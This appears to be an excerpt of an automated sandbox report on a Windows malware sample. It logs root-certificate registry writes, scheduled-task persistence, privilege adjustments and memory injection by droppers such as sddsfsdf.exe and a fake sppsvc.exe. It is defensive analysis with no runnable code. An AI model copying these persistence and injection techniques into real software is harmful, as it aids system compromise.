Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Windows\twain_32\sppsvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Windows\twain_32\sppsvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Windows\twain_32\sppsvc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\system32\CMD.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\twain_32\sppsvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1976 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 1976 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 1976 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 1976 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 1976 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 1976 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 1976 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 1976 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 1976 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 1976 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
